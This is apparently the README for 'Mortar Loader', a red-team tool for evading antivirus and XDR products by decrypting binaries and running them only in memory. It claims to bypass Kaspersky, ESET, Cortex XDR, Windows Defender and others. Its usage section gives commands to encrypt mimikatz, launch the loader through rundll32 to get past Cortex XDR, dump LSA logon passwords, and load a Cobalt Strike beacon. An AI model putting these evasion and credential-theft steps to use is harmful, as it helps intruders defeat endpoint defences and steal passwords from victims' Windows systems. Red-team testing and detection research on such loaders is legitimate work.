mortar: evasion technique to defeat and divert detection and prevention of security products
Mortar Loader
red teaming evasion technique to defeat and divert detection and prevention of security products. Mortar Loader performs encryption and decryption of selected binary inside the memory streams and executes it directly with out writing any malicious indicator into the hard drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions and it has been tested and confirmed bypass for the following:
- Kaspersky
- ESET
- Malewarebytes
- Mcafee
- Cortex XDR
- Windows defender
- Cylance
The detailed research is here.
Usage
Encryptor
root@kali>./encryptor -f mimikatz.exe -o bin.tmp
Loader (DLL)
for bypassing Cortex XDR, add agressor.dll with bin.tmp in the same folder and script the following bat file
@echo off
cmd.exe /c rundll32.exe agressor.dll,stealth
for normal usage, you can directly execute the agressor.dll
rundll32.exe agressor.dll,dec
Loader (EXE)
the executable version has more options you can use, as you able to pass commands for the loaded binary
##Mimikatz dump LSA
deliver.exe -d -c sekurlasa::logonpasswords -f mimikatz.enc## Cobalt strike beacon
deliver.exe -d -f cobalt.enc
Install
Copyright (c) 2021 0xsp security research and development
